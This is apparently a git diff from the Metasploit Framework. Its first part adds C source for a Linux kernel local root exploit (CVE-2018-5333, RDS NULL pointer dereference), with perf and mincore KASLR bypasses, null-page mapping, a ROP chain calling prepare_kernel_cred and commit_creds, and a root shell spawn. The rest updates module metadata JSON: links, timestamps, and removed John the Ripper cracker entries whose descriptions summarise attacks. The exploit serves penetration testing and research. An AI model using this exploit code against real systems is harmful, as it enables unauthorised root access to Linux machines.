+  uint64_t page_size = getpagesize();
+  struct perf_event_mmap_page *meta_page = NULL;
+  meta_page = mmap(NULL, (page_size * 2), PROT_READ | PROT_WRITE, MAP_SHARED, fd, 0);
+
+  if (meta_page == MAP_FAILED) {
+    dprintf("[-] mmap() failed: %m\n");
+    if (child) kill(child, SIGKILL);
+    if (fd > 0) close(fd);
+    return 0;
+  }
+
+  if (ioctl(fd, PERF_EVENT_IOC_ENABLE)) {
+    dprintf("[-] ioctl failed: %m\n");
+    if (child) kill(child, SIGKILL);
+    if (fd > 0) close(fd);
+    return 0;
+  }
+  char *data_page = ((char *) meta_page) + page_size;
+
+  size_t progress = 0;
+  uint64_t last_head = 0;
+  size_t num_samples = 0;
+  unsigned long min_addr = ~0;
+  while (num_samples < 100) {
+    /* is reading from the meta_page racy? no idea */
+    while (meta_page->data_head == last_head);;
+    last_head = meta_page->data_head;
+
+    while (progress < last_head) {
+      struct __attribute__((packed)) sample {
+        struct perf_event_header header;
+        uint64_t ip;
+      } *here = (struct sample *) (data_page + progress % page_size);
+      switch (here->header.type) {
+      case PERF_RECORD_SAMPLE:
+        num_samples++;
+        if (here->header.size < sizeof(*here)) {
+          dprintf("[-] size too small.\n");
+          if (child) kill(child, SIGKILL);
+          if (fd > 0) close(fd);
+          return 0;
+        }
+
+        uint64_t prefix;
+        if (strstr(kernels[kernel].kernel_version, "4.8.0-")) {
+          prefix = here->ip & ~0xfffff;
+        } else {
+          prefix = here->ip & ~0xffffff;
+        }
+
+        if (prefix < min_addr) min_addr = prefix;
+        break;
+      case PERF_RECORD_THROTTLE:
+      case PERF_RECORD_UNTHROTTLE:
+      case PERF_RECORD_LOST:
+        break;
+      default:
+        dprintf("[-] unexpected perf event: %x\n", here->header.type);
+        if (child) kill(child, SIGKILL);
+              if (fd > 0) close(fd);
+        return 0;
+      }
+      progress += here->header.size;
+    }
+    /* tell the kernel we read it. */
+    meta_page->data_tail = last_head;
+  }
+
+  if (child) kill(child, SIGKILL);
+  if (fd > 0) close(fd);
+  return min_addr;
+}
+#endif
+
+// * * * * * * * * * * * * * * mincore KASLR bypass * * * * * * * * * * * * * *
+// https://bugs.chromium.org/p/project-zero/issues/detail?id=1431
+
+#if ENABLE_KASLR_BYPASS_MINCORE
+unsigned long get_kernel_addr_mincore() {
+  unsigned char buf[getpagesize() / sizeof(unsigned char)];
+  unsigned long iterations = 20000000;
+  unsigned long addr = 0;
+
+  dprintf("[.] trying mincore info leak...\n");
+
+  if (strstr(kernels[kernel].kernel_version, "4.8.0-")) {
+    dprintf("[-] target kernel does not permit mincore info leak\n");
+    return 0;
+  }
+
+  /* A MAP_ANONYMOUS | MAP_HUGETLB mapping */
+  if (mmap((void*)0x66000000, 0x20000000000,
+       PROT_NONE, MAP_SHARED | MAP_ANONYMOUS | MAP_HUGETLB | MAP_NORESERVE, -1, 0) == MAP_FAILED) {
+    dprintf("[-] mmap(): %m\n");
+    return 0;
+  }
+
+  int i;
+  for (i = 0; i <= iterations; i++) {
+    /* Touch a mishandle with this type mapping */
+    if (mincore((void*)0x86000000, 0x1000000, buf)) {
+      dprintf("[-] mincore(): %m\n");
+      return 0;
+    }
+
+    int n;
+    for (n = 0; n < getpagesize() / sizeof(unsigned char); n++) {
+      addr = *(unsigned long*)(&buf[n]);
+      /* Kernel address space */
+      if (addr > KERNEL_BASE_MIN && addr < KERNEL_BASE_MAX) {
+        addr &= 0xffffffffff000000ul;
+        if (munmap((void*)0x66000000, 0x20000000000))
+          dprintf("[-] munmap(): %m\n");
+        return addr;
+      }
+    }
+  }
+
+  if (munmap((void*)0x66000000, 0x20000000000))
+    dprintf("[-] munmap(): %m\n");
+
+  dprintf("[-] kernel base not found in mincore info leak\n");
+  return 0;
+}
+#endif
+
+// * * * * * * * * * * * * * * KASLR bypasses * * * * * * * * * * * * * * * *
+
+unsigned long get_kernel_addr() {
+  unsigned long addr = 0;
+
+#if ENABLE_KASLR_BYPASS_KALLSYMS
+  addr = get_kernel_addr_kallsyms();
+  if (addr) return addr;
+#endif
+
+#if ENABLE_KASLR_BYPASS_SYSLOG
+  addr = get_kernel_addr_syslog();
+  if (addr) return addr;
+#endif
+
+#if ENABLE_KASLR_BYPASS_PERF
+  addr = get_kernel_addr_perf();
+  if (addr) return addr;
+#endif
+
+#if ENABLE_KASLR_BYPASS_MINCORE
+  addr = get_kernel_addr_mincore();
+  if (addr) return addr;
+#endif
+
+  dprintf("[-] KASLR bypass failed, kernel base not found\n");
+  exit(EXIT_FAILURE);
+
+  return 0;
+}
+
+// * * * * * * * * * * * * * * * * * Main * * * * * * * * * * * * * * * * * *
+
+static void shell() {
+  if (getuid() == 0 && geteuid() == 0) {
+    dprintf("[+] got root\n");
+    system(SHELL);
+  } else {
+    dprintf("[-] failed\n");
+  }
+  exit(EXIT_FAILURE);
+}
+
+void fork_shell() {
+  pid_t rv;
+
+  rv = fork();
+  if (rv == -1) {
+    dprintf("[-] fork(): %m\n");
+    exit(EXIT_FAILURE);
+  }
+
+  if (rv == 0)
+    shell();
+}
+
+int main(int argc, char *argv[]) {
+  if (argc > 1) SHELL = argv[1];
+  dprintf("Linux RDS rds_atomic_free_op NULL pointer dereference local root (CVE-2018-5333)\n");
+
+  dprintf("[.] checking kernel version...\n");
+  detect_versions();
+  dprintf("[~] done, version looks good\n");
+
+#if ENABLE_SYSTEM_CHECKS
+  dprintf("[.] checking system...\n");
+  check_env();
+  dprintf("[~] done, looks good\n");
+#endif
+
+  dprintf("[.] mapping null address...\n");
+  map_null();
+  dprintf("[~] done, mapped null address\n");
+
+#if ENABLE_KASLR_BYPASS
+  dprintf("[.] KASLR bypass enabled, getting kernel base address\n");
+  KERNEL_BASE = get_kernel_addr();
+  dprintf("[.] done, kernel text:   %lx\n", KERNEL_BASE);
+#endif
+
+  unsigned long commit_creds =        (KERNEL_BASE + kernels[kernel].commit_creds);
+  unsigned long prepare_kernel_cred = (KERNEL_BASE + kernels[kernel].prepare_kernel_cred);
+  unsigned long xor_rdi =             (KERNEL_BASE + kernels[kernel].xor_rdi);
+  unsigned long mov_rdi_rax =         (KERNEL_BASE + kernels[kernel].mov_rdi_rax);
+  unsigned long xchg_esp =            (KERNEL_BASE + kernels[kernel].xchg_esp);
+  unsigned long swapgs =              (KERNEL_BASE + kernels[kernel].swapgs);
+  unsigned long iretq =               (KERNEL_BASE + kernels[kernel].iretq);
+
+  dprintf("[.] commit_creds:        %lx\n", commit_creds);
+  dprintf("[.] prepare_kernel_cred: %lx\n", prepare_kernel_cred);
+
+  dprintf("[.] mmapping fake stack...\n");
+
+  uint64_t page_size = getpagesize();
+  uint64_t stack_aligned = (xchg_esp & 0x00000000fffffffful) & ~(page_size - 1);
+  uint64_t stack_offset = xchg_esp % page_size;
+
+  unsigned long *fake_stack = mmap((void*)stack_aligned, 0x200000,
+    PROT_READ | PROT_WRITE, MAP_PRIVATE | MAP_ANONYMOUS | MAP_GROWSDOWN | MAP_FIXED, -1, 0);
+
+  if (fake_stack == MAP_FAILED) {
+    dprintf("[-] mmap(fake_stack): %m\n");
+    exit(EXIT_FAILURE);
+  }
+
+  unsigned long *temp_stack = mmap((void*)0x30000000, 0x10000000,
+    PROT_READ | PROT_WRITE, MAP_PRIVATE | MAP_ANONYMOUS | MAP_GROWSDOWN | MAP_FIXED, -1, 0);
+
+  if (temp_stack == MAP_FAILED) {
+    dprintf("[-] mmap(temp_stack): %m\n");
+    exit(EXIT_FAILURE);
+  }
+
+  static unsigned long result = 0;
+  unsigned long *data = (unsigned long *)0;
+  data[1] = (uint64_t)&result;
+  data[3] = xchg_esp;
+
+  save_state();
+  debug_enable_sigsev_handler();
+
+  fake_stack = (unsigned long *)(stack_aligned + stack_offset);
+
+  int i = 0;
+
+  fake_stack[i++] = xor_rdi;
+  fake_stack[i++] = prepare_kernel_cred;
+  fake_stack[i++] = mov_rdi_rax;
+  fake_stack[i++] = 0x12345678;
+  fake_stack[i++] = 0x12345678;
+  fake_stack[i++] = 0x12345678;
+  fake_stack[i++] = commit_creds;
+
+  fake_stack[i++] = swapgs;
+  fake_stack[i++] = 0x12345678;
+
+  fake_stack[i++] = iretq;
+  fake_stack[i++] = (unsigned long)shell;
+  fake_stack[i++] = user_cs;
+  fake_stack[i++] = user_rflags;
+  fake_stack[i++] = (unsigned long)(temp_stack + 0x500000);
+  fake_stack[i++] = user_ss;
+
+  dprintf("[~] done, fake stack mmapped\n");
+
+  dprintf("[.] executing payload %p...\n", (void*)&shell);
+  trigger_bug();
+
+  return 0;
+}
+

db/modules_metadata_base.json

@@ -64,7 +64,7 @@
     ],
     "description": "This module combines two vulnerabilities to achieve remote code\n        execution on affected Android devices. First, the module exploits\n        CVE-2014-6041, a Universal Cross-Site Scripting (UXSS) vulnerability present in\n        versions of Android's open source stock browser (the AOSP Browser) prior to\n        4.4. Second, the Google Play store's web interface fails to enforce a\n        X-Frame-Options: DENY header (XFO) on some error pages, and therefore, can be\n        targeted for script injection. As a result, this leads to remote code execution\n        through Google Play's remote installation feature, as any application available\n        on the Google Play store can be installed and launched on the user's device.\n\n        This module requires that the user is logged into Google with a vulnerable browser.\n\n        To list the activities in an APK, you can use `aapt dump badging /path/to/app.apk`.",
     "references": [
-      "URL-https://community.rapid7.com/community/metasploit/blog/2014/09/15/major-android-bug-is-a-privacy-disaster-cve-2014-6041",
+      "URL-https://blog.rapid7.com/2014/09/15/major-android-bug-is-a-privacy-disaster-cve-2014-6041",
       "URL-http://1337day.com/exploit/description/22581",
       "OSVDB-110664",
       "CVE-2014-6041"
@@ -79,7 +79,7 @@
 
     ],
     "targets": null,
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2020-02-18 08:58:30 +0000",
     "path": "/modules/auxiliary/admin/android/google_play_store_uxss_xframe_rce.rb",
     "is_install_path": true,
     "ref_name": "admin/android/google_play_store_uxss_xframe_rce",
@@ -198,7 +198,7 @@
     ],
     "description": "This module acts as a simplistic administrative client for interfacing\n        with Veeder-Root Automatic Tank Gauges (ATGs) or other devices speaking\n        the TLS-250 and TLS-350 protocols.  This has been tested against\n        GasPot and Conpot, both honeypots meant to simulate ATGs; it has not\n        been tested against anything else, so use at your own risk.",
     "references": [
-      "URL-https://community.rapid7.com/community/infosec/blog/2015/01/22/the-internet-of-gas-station-tank-gauges",
+      "URL-https://blog.rapid7.com/2015/01/22/the-internet-of-gas-station-tank-gauges",
       "URL-http://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/the-gaspot-experiment",
       "URL-https://github.com/sjhilt/GasPot",
       "URL-https://github.com/mushorg/conpot",
@@ -216,7 +216,7 @@
 
     ],
     "targets": null,
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2020-02-18 08:58:30 +0000",
     "path": "/modules/auxiliary/admin/atg/atg_client.rb",
     "is_install_path": true,
     "ref_name": "admin/atg/atg_client",
@@ -1204,7 +1204,7 @@
       "CVE-2015-0964",
       "CVE-2015-0965",
       "CVE-2015-0966",
-      "URL-https://community.rapid7.com/community/infosec/blog/2015/06/05/r7-2015-01-csrf-backdoor-and-persistent-xss-on-arris-motorola-cable-modems"
+      "URL-https://blog.rapid7.com/2015/06/05/r7-2015-01-csrf-backdoor-and-persistent-xss-on-arris-motorola-cable-modems"
     ],
     "platform": "",
     "arch": "",
@@ -1216,7 +1216,7 @@
 
     ],
     "targets": null,
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2020-02-18 08:58:30 +0000",
     "path": "/modules/auxiliary/admin/http/arris_motorola_surfboard_backdoor_xss.rb",
     "is_install_path": true,
     "ref_name": "admin/http/arris_motorola_surfboard_backdoor_xss",
@@ -2661,7 +2661,7 @@
     "references": [
       "CVE-2013-0136",
       "US-CERT-VU-701572",
-      "URL-https://community.rapid7.com/community/metasploit/blog/2013/05/15/new-1day-exploits-mutiny-vulnerabilities"
+      "URL-https://blog.rapid7.com/2013/05/15/new-1day-exploits-mutiny-vulnerabilities"
     ],
     "platform": "",
     "arch": "",
@@ -2682,7 +2682,7 @@
       "https"
     ],
     "targets": null,
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2020-02-18 08:58:30 +0000",
     "path": "/modules/auxiliary/admin/http/mutiny_frontend_read_delete.rb",
     "is_install_path": true,
     "ref_name": "admin/http/mutiny_frontend_read_delete",
@@ -2907,7 +2907,7 @@
     ],
     "description": "Nexpose v5.7.2 and prior is vulnerable to a XML External Entity attack via a number\n        of vectors. This vulnerability can allow an attacker to a craft special XML that\n        could read arbitrary files from the filesystem. This module exploits the\n        vulnerability via the XML API.",
     "references": [
-      "URL-https://community.rapid7.com/community/nexpose/blog/2013/08/16/r7-vuln-2013-07-24"
+      "URL-https://blog.rapid7.com/2013/08/16/r7-vuln-2013-07-24"
     ],
     "platform": "",
     "arch": "",
@@ -2928,7 +2928,7 @@
       "https"
     ],
     "targets": null,
-    "mod_time": "2017-10-09 17:06:05 +0000",
+    "mod_time": "2020-02-18 08:58:30 +0000",
     "path": "/modules/auxiliary/admin/http/nexpose_xxe_file_read.rb",
     "is_install_path": true,
     "ref_name": "admin/http/nexpose_xxe_file_read",
@@ -3054,7 +3054,7 @@
       "CVE-2013-3617",
       "OSVDB-99141",
       "BID-63431",
-      "URL-https://community.rapid7.com/community/metasploit/blog/2013/10/30/seven-tricks-and-treats"
+      "URL-https://blog.rapid7.com/2013/10/30/seven-tricks-and-treats"
     ],
     "platform": "",
     "arch": "",
@@ -3075,7 +3075,7 @@
       "https"
     ],
     "targets": null,
-    "mod_time": "2017-08-24 21:38:44 +0000",
+    "mod_time": "2020-02-18 08:58:30 +0000",
     "path": "/modules/auxiliary/admin/http/openbravo_xxe.rb",
     "is_install_path": true,
     "ref_name": "admin/http/openbravo_xxe",
@@ -4558,7 +4558,7 @@
       "URL-http://blogs.technet.com/b/srd/archive/2014/11/18/additional-information-about-cve-2014-6324.aspx",
       "URL-https://labs.mwrinfosecurity.com/blog/2014/12/16/digging-into-ms14-068-exploitation-and-defence/",
       "URL-https://github.com/bidord/pykek",
-      "URL-https://community.rapid7.com/community/metasploit/blog/2014/12/25/12-days-of-haxmas-ms14-068-now-in-metasploit"
+      "URL-https://blog.rapid7.com/2014/12/25/12-days-of-haxmas-ms14-068-now-in-metasploit"
     ],
     "platform": "",
     "arch": "",
@@ -4570,7 +4570,7 @@
 
     ],
     "targets": null,
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2020-02-18 08:58:30 +0000",
     "path": "/modules/auxiliary/admin/kerberos/ms14_068_kerberos_checksum.rb",
     "is_install_path": true,
     "ref_name": "admin/kerberos/ms14_068_kerberos_checksum",
@@ -6733,7 +6733,7 @@
     "description": "This module allows an unauthenticated user to interact with the Yokogawa\n        CENTUM CS3000 BKBCopyD.exe service through the PMODE, RETR and STOR\n        operations.",
     "references": [
       "CVE-2014-5208",
-      "URL-https://community.rapid7.com/community/metasploit/blog/2014/08/09/r7-2014-10-disclosure-yokogawa-centum-cs3000-bkbcopydexe-file-system-access"
+      "URL-https://blog.rapid7.com/2014/08/09/r7-2014-10-disclosure-yokogawa-centum-cs3000-bkbcopydexe-file-system-access"
     ],
     "platform": "",
     "arch": "",
@@ -6745,7 +6745,7 @@
 
     ],
     "targets": null,
-    "mod_time": "2019-09-24 12:15:43 +0000",
+    "mod_time": "2020-02-18 08:58:30 +0000",
     "path": "/modules/auxiliary/admin/scada/yokogawa_bkbcopyd_client.rb",
     "is_install_path": true,
     "ref_name": "admin/scada/yokogawa_bkbcopyd_client",
@@ -8083,10 +8083,10 @@
     "name": "Password Cracker: Databases",
     "fullname": "auxiliary/analyze/crack_databases",
     "aliases": [
-      "auxiliary/analyze/jtr_mssql",
-      "auxiliary/analyze/jtr_mysql",
-      "auxiliary/analyze/jtr_oracle",
-      "auxiliary/analyze/jtr_postgres"
+      "auxiliary/analyze/jtr_mssql_fast",
+      "auxiliary/analyze/jtr_mysql_fast",
+      "auxiliary/analyze/jtr_oracle_fast",
+      "auxiliary/analyze/jtr_postgres_fast"
     ],
     "rank": 300,
     "disclosure_date": null,
@@ -8110,7 +8110,7 @@
 
     ],
     "targets": null,
-    "mod_time": "2019-10-08 20:31:23 +0000",
+    "mod_time": "2020-02-06 10:23:53 +0000",
     "path": "/modules/auxiliary/analyze/crack_databases.rb",
     "is_install_path": true,
     "ref_name": "analyze/crack_databases",
@@ -8275,8 +8275,7 @@
     "name": "Password Cracker: Windows",
     "fullname": "auxiliary/analyze/crack_windows",
     "aliases": [
-      "auxiliary/analyze/jtr_crack_fast",
-      "auxiliary/analyze/jtr_windows"
+      "auxiliary/analyze/jtr_windows_fast"
     ],
     "rank": 300,
     "disclosure_date": null,
@@ -8300,7 +8299,7 @@
 
     ],
     "targets": null,
-    "mod_time": "2019-10-08 20:31:23 +0000",
+    "mod_time": "2020-02-06 10:23:53 +0000",
     "path": "/modules/auxiliary/analyze/crack_windows.rb",
     "is_install_path": true,
     "ref_name": "analyze/crack_windows",
@@ -8311,270 +8310,6 @@
     },
     "needs_cleanup": false
   },
-  "auxiliary_analyze/jtr_aix": {
-    "name": "John the Ripper AIX Password Cracker",
-    "fullname": "auxiliary/analyze/jtr_aix",
-    "aliases": [
-
-    ],
-    "rank": 300,
-    "disclosure_date": null,
-    "type": "auxiliary",
-    "author": [
-      "theLightCosine <theLightCosine@metasploit.com>",
-      "hdm <x@hdm.io>"
-    ],
-    "description": "This module uses John the Ripper to identify weak passwords that have been\n        acquired from passwd files on AIX systems.",
-    "references": [
-
-    ],
-    "platform": "",
-    "arch": "",
-    "rport": null,
-    "autofilter_ports": [
-
-    ],
-    "autofilter_services": [
-
-    ],
-    "targets": null,
-    "mod_time": "2019-11-07 19:09:52 +0000",
-    "path": "/modules/auxiliary/analyze/jtr_aix.rb",
-    "is_install_path": true,
-    "ref_name": "analyze/jtr_aix",
-    "check": false,
-    "post_auth": false,
-    "default_credential": false,
-    "notes": {
-    },
-    "needs_cleanup": false
-  },
-  "auxiliary_analyze/jtr_linux": {
-    "name": "John the Ripper Linux Password Cracker",
-    "fullname": "auxiliary/analyze/jtr_linux",
-    "aliases": [
-
-    ],
-    "rank": 300,
-    "disclosure_date": null,
-    "type": "auxiliary",
-    "author": [
-      "theLightCosine <theLightCosine@metasploit.com>",
-      "hdm <x@hdm.io>"
-    ],
-    "description": "This module uses John the Ripper to identify weak passwords that have been\n        acquired from unshadowed passwd files from Unix systems. The module will only crack\n        MD5, BSDi and DES implementations by default. Set Crypt to true to also try to crack\n        Blowfish and SHA(256/512). Warning: This is much slower.",
-    "references": [
-
-    ],
-    "platform": "",
-    "arch": "",
-    "rport": null,
-    "autofilter_ports": [
-
-    ],
-    "autofilter_services": [
-
-    ],
-    "targets": null,
-    "mod_time": "2019-11-07 19:09:52 +0000",
-    "path": "/modules/auxiliary/analyze/jtr_linux.rb",
-    "is_install_path": true,
-    "ref_name": "analyze/jtr_linux",
-    "check": false,
-    "post_auth": false,
-    "default_credential": false,
-    "notes": {
-    },
-    "needs_cleanup": false
-  },
-  "auxiliary_analyze/jtr_mssql_fast": {
-    "name": "John the Ripper MS SQL Password Cracker (Fast Mode)",
-    "fullname": "auxiliary/analyze/jtr_mssql_fast",
-    "aliases": [
-
-    ],
-    "rank": 300,
-    "disclosure_date": null,
-    "type": "auxiliary",
-    "author": [
-      "theLightCosine <theLightCosine@metasploit.com>",
-      "hdm <x@hdm.io>"
-    ],
-    "description": "This module uses John the Ripper to identify weak passwords that have been\n        acquired from the mssql_hashdump module. Passwords that have been successfully\n        cracked are then saved as proper credentials.",
-    "references": [
-
-    ],
-    "platform": "",
-    "arch": "",
-    "rport": null,
-    "autofilter_ports": [
-
-    ],
-    "autofilter_services": [
-
-    ],
-    "targets": null,
-    "mod_time": "2019-11-07 19:09:52 +0000",
-    "path": "/modules/auxiliary/analyze/jtr_mssql_fast.rb",
-    "is_install_path": true,
-    "ref_name": "analyze/jtr_mssql_fast",
-    "check": false,
-    "post_auth": false,
-    "default_credential": false,
-    "notes": {
-    },
-    "needs_cleanup": false
-  },
-  "auxiliary_analyze/jtr_mysql_fast": {
-    "name": "John the Ripper MySQL Password Cracker (Fast Mode)",
-    "fullname": "auxiliary/analyze/jtr_mysql_fast",
-    "aliases": [
-
-    ],
-    "rank": 300,
-    "disclosure_date": null,
-    "type": "auxiliary",
-    "author": [
-      "theLightCosine <theLightCosine@metasploit.com>",
-      "hdm <x@hdm.io>"
-    ],
-    "description": "This module uses John the Ripper to identify weak passwords that have been\n        acquired from the mysql_hashdump module. Passwords that have been successfully\n        cracked are then saved as proper credentials.",
-    "references": [
-
-    ],
-    "platform": "",
-    "arch": "",
-    "rport": null,
-    "autofilter_ports": [
-
-    ],
-    "autofilter_services": [
-
-    ],
-    "targets": null,
-    "mod_time": "2019-11-07 19:09:52 +0000",
-    "path": "/modules/auxiliary/analyze/jtr_mysql_fast.rb",
-    "is_install_path": true,
-    "ref_name": "analyze/jtr_mysql_fast",
-    "check": false,
-    "post_auth": false,
-    "default_credential": false,
-    "notes": {
-    },
-    "needs_cleanup": false
-  },
-  "auxiliary_analyze/jtr_oracle_fast": {
-    "name": "John the Ripper Oracle Password Cracker (Fast Mode)",
-    "fullname": "auxiliary/analyze/jtr_oracle_fast",
-    "aliases": [
-
-    ],
-    "rank": 300,
-    "disclosure_date": null,
-    "type": "auxiliary",
-    "author": [
-      "theLightCosine <theLightCosine@metasploit.com>",
-      "hdm <x@hdm.io>"
-    ],
-    "description": "This module uses John the Ripper to identify weak passwords that have been\n        acquired from the oracle_hashdump module. Passwords that have been successfully\n        cracked are then saved as proper credentials.",
-    "references": [
-
-    ],
-    "platform": "",
-    "arch": "",
-    "rport": null,
-    "autofilter_ports": [
-
-    ],
-    "autofilter_services": [
-
-    ],
-    "targets": null,
-    "mod_time": "2019-11-07 19:09:52 +0000",
-    "path": "/modules/auxiliary/analyze/jtr_oracle_fast.rb",
-    "is_install_path": true,
-    "ref_name": "analyze/jtr_oracle_fast",
-    "check": false,
-    "post_auth": false,
-    "default_credential": false,
-    "notes": {
-    },
-    "needs_cleanup": false
-  },
-  "auxiliary_analyze/jtr_postgres_fast": {
-    "name": "John the Ripper Postgres SQL Password Cracker",
-    "fullname": "auxiliary/analyze/jtr_postgres_fast",
-    "aliases": [
-
-    ],
-    "rank": 300,
-    "disclosure_date": null,
-    "type": "auxiliary",
-    "author": [
-      "theLightCosine <theLightCosine@metasploit.com>"
-    ],
-    "description": "This module uses John the Ripper to attempt to crack Postgres password\n          hashes, gathered by the postgres_hashdump module. It is slower than some of the other\n          JtR modules because it has to do some wordlist manipulation to properly handle postgres'\n          format.",
-    "references": [
-
-    ],
-    "platform": "",
-    "arch": "",
-    "rport": null,
-    "autofilter_ports": [
-
-    ],
-    "autofilter_services": [
-
-    ],
-    "targets": null,
-    "mod_time": "2019-11-07 19:09:52 +0000",
-    "path": "/modules/auxiliary/analyze/jtr_postgres_fast.rb",
-    "is_install_path": true,
-    "ref_name": "analyze/jtr_postgres_fast",
-    "check": false,
-    "post_auth": false,
-    "default_credential": false,
-    "notes": {
-    },
-    "needs_cleanup": false
-  },
-  "auxiliary_analyze/jtr_windows_fast": {
-    "name": "John the Ripper Windows Password Cracker (Fast Mode)",
-    "fullname": "auxiliary/analyze/jtr_windows_fast",
-    "aliases": [
-
-    ],
-    "rank": 300,
-    "disclosure_date": null,
-    "type": "auxiliary",
-    "author": [
-      "hdm <x@hdm.io>"
-    ],
-    "description": "This module uses John the Ripper to identify weak passwords that have been\n        acquired as hashed files (loot) or raw LANMAN/NTLM hashes (hashdump). The goal\n        of this module is to find trivial passwords in a short amount of time. To\n        crack complex passwords or use large wordlists, John the Ripper should be\n        used outside of Metasploit. This initial version just handles LM/NTLM credentials\n        from hashdump and uses the standard wordlist and rules.",
-    "references": [
-
-    ],
-    "platform": "",
-    "arch": "",
-    "rport": null,
-    "autofilter_ports": [
-
-    ],
-    "autofilter_services": [
-
-    ],
-    "targets": null,
-    "mod_time": "2019-11-07 19:09:52 +0000",
-    "path": "/modules/auxiliary/analyze/jtr_windows_fast.rb",
-    "is_install_path": true,
-    "ref_name": "analyze/jtr_windows_fast",
-    "check": false,
-    "post_auth": false,
-    "default_credential": false,
-    "notes": {
-    },
-    "needs_cleanup": false
-  },
   "auxiliary_analyze/modbus_zip": {
     "name": "Extract zip from Modbus communication",
     "fullname": "auxiliary/analyze/modbus_zip",
@@ -10296,7 +10031,7 @@
     "description": "This module exploits a heap overflow in NFRAgent.exe, a component of Novell\n        File Reporter (NFR). The vulnerability occurs when handling requests of name \"SRS\",\n        where NFRAgent.exe fails to generate a response in a secure way, copying user\n        controlled data into a fixed-length buffer in the heap without bounds checking.\n        This module has been tested against NFR Agent 1.0.4.3 (File Reporter 1.0.2).",
     "references": [
       "CVE-2012-4956",
-      "URL-https://community.rapid7.com/community/metasploit/blog/2012/11/16/nfr-agent-buffer-vulnerabilites-cve-2012-4959"
+      "URL-https://blog.rapid7.com/2012/11/16/nfr-agent-buffer-vulnerabilites-cve-2012-4959"
     ],
     "platform": "",
     "arch": "",
@@ -10317,7 +10052,7 @@
       "https"
     ],
     "targets": null,
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2020-02-18 08:58:30 +0000",
     "path": "/modules/auxiliary/dos/http/novell_file_reporter_heap_bof.rb",
     "is_install_path": true,
     "ref_name": "dos/http/novell_file_reporter_heap_bof",
@@ -11545,7 +11280,7 @@
     "description": "This module abuses a buffer overflow vulnerability to trigger a Denial of Service\n        of the BKCLogSvr component in the Yokogaca CENTUM CS 3000 product. The vulnerability\n        exists in the handling of malformed log packets, with an unexpected long level field.\n        The root cause of the vulnerability is a combination of usage of uninitialized memory\n        from the stack and a dangerous string copy. This module has been tested successfully\n        on Yokogawa CENTUM CS 3000 R3.08.50.",
     "references": [
       "URL-http://www.yokogawa.com/dcs/security/ysar/YSAR-14-0001E.pdf",
-      "URL-https://community.rapid7.com/community/metasploit/blog/2014/03/10/yokogawa-centum-cs3000-vulnerabilities",
+      "URL-https://blog.rapid7.com/2014/03/10/yokogawa-centum-cs3000-vulnerabilities",
       "CVE-2014-0781"
     ],
     "platform": "",
@@ -11558,7 +11293,7 @@
 
     ],
     "targets": null,
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2020-02-18 08:58:30 +0000",
     "path": "/modules/auxiliary/dos/scada/yokogawa_logsvr.rb",
     "is_install_path": true,
     "ref_name": "dos/scada/yokogawa_logsvr",
@@ -12763,7 +12498,7 @@
       "URL-http://pastie.org/private/feg8du0e9kfagng4rrg",
       "URL-http://stratsec.blogspot.com.au/2012/03/ms12-020-vulnerability-for-breakfast.html",
       "EDB-18606",
-      "URL-https://community.rapid7.com/community/metasploit/blog/2012/03/21/metasploit-update"
+      "URL-https://blog.rapid7.com/2012/03/21/metasploit-update"
     ],
     "platform": "",
     "arch": "",
@@ -12775,7 +12510,7 @@
 
     ],
     "targets": null,
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2020-02-18 08:58:30 +0000",
     "path": "/modules/auxiliary/dos/windows/rdp/ms12_020_maxchannelids.rb",
     "is_install_path": true,
     "ref_name": "dos/windows/rdp/ms12_020_maxchannelids",
@@ -14940,7 +14675,7 @@
     ],
     "description": "Generates a .webarchive file for Mac OS X Safari that will attempt to\n        inject cross-domain Javascript (UXSS), silently install a browser\n        extension, collect user information, steal the cookie database,\n        and steal arbitrary local files.\n\n        When opened on the target machine the webarchive file must not have the\n        quarantine attribute set, as this forces the webarchive to execute in a\n        sandbox.",
     "references": [
-      "URL-https://community.rapid7.com/community/metasploit/blog/2013/04/25/abusing-safaris-webarchive-file-format"
+      "URL-https://blog.rapid7.com/2013/04/25/abusing-safaris-webarchive-file-format"
     ],
     "platform": "",
     "arch": "",
@@ -14952,7 +14687,7 @@
 
     ],
     "targets": null,
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2020-02-18 08:58:30 +0000",
     "path": "/modules/auxiliary/gather/apple_safari_webarchive_uxss.rb",
     "is_install_path": true,
     "ref_name": "gather/apple_safari_webarchive_uxss",
@@ -17525,7 +17260,7 @@
 
     ],
     "targets": null,
-    "mod_time": "2018-01-13 22:55:01 +0000",
+    "mod_time": "2020-01-16 14:21:09 +0000",
     "path": "/modules/auxiliary/gather/nis_bootparamd_domain.rb",
     "is_install_path": true,
     "ref_name": "gather/nis_bootparamd_domain",
@@ -17563,7 +17298,7 @@
 
     ],
     "targets": null,
-    "mod_time": "2018-01-13 22:55:01 +0000",
+    "mod_time": "2020-01-16 14:21:09 +0000",
     "path": "/modules/auxiliary/gather/nis_ypserv_map.rb",
     "is_install_path": true,
     "ref_name": "gather/nis_ypserv_map",
@@ -22706,7 +22441,7 @@
       "https"
     ],
     "targets": null,
-    "mod_time": "2020-01-14 00:25:18 +0000",
+    "mod_time": "2020-01-14 11:21:03 +0000",
     "path": "/modules/auxiliary/scanner/http/citrix_dir_traversal.rb",
     "is_install_path": true,
     "ref_name": "scanner/http/citrix_dir_traversal",
@@ -27726,7 +27461,7 @@
     "description": "NFRAgent.exe, a component of Novell File Reporter (NFR), allows remote attackers to retrieve\n        arbitrary text files via a directory traversal while handling requests to /FSF/CMD\n        with an FSFUI record with UICMD 126. This module has been tested successfully\n        against NFR Agent 1.0.4.3 (File Reporter 1.0.2) and NFR Agent 1.0.3.22 (File\n        Reporter 1.0.1).",
     "references": [
       "CVE-2012-4958",
-      "URL-https://community.rapid7.com/community/metasploit/blog/2012/11/16/nfr-agent-buffer-vulnerabilites-cve-2012-4959"
+      "URL-https://blog.rapid7.com/2012/11/16/nfr-agent-buffer-vulnerabilites-cve-2012-4959"
     ],
